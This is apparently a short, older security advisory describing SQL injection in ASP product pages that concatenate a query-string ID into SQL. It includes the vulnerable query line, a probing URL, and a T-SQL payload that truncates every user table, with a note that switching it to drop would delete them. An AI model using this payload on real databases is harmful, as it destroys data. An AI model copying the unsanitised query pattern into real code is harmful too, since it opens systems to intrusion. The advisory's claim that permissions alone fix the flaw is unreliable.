COMMAND

    asp (?)

SYSTEMS AFFECTED

    ASP/SQL

PROBLEM

    Steve  Wilding  posted  following.    A  bug  that  he  has   been
    experimenting with  is that  many websites  when calling  products
    from the  database don't  verify the  data before  passing it into
    SQL:

        Sql = "SELECT * FROM Products WHERE ProductID=" & Request.QueryString("ID")

    They are  assuming that  "ID" will  be a  number and  Allow SQL to
    execute it.  Therefore a url like

        http://www.someserver.com/products.asp?ID=(SELECT+*+FROM+TableX)

    would generate this error

        Microsoft OLE DB Provider for ODBC Drivers error '80040e37'
        [Microsoft][ODBC SQL Server Driver][SQL Server]Invalid object name 'TABLEX'
        /products.asp, line 11

    This means that SQL executed the command "SELECT * FROM TableX"

    Now What do  you suppose would  happen if you  where to pass  this
    into SQL via a QueryString?

        DECLARE @TableName varchar(100) DECLARE Tables CURSOR FOR
        SELECT Name FROM SysObjects WHERE xType = 'U'
        OPEN Tables
        FETCH NEXT FROM Tables Into @TableName
        WHILE @@FETCH_STATUS = 0
        BEGIN
        Exec ('Truncate Table ' + @TableName)
        FETCH NEXT FROM Tables
        END
        CLOSE Tables
        DEALLOCATE Tables

    EVERY TABLE IN THE DATABASE WOULD BE TRUNCATED!  Change "Truncate"
    to "Drop"  and every  table would  be deleted,  if permissions are
    not properly set.

SOLUTION

    This is in reality is not  bug, but something that happend due  to
    bad permissions  applied.   Setting correct  permissions will make
    this problem dissapear.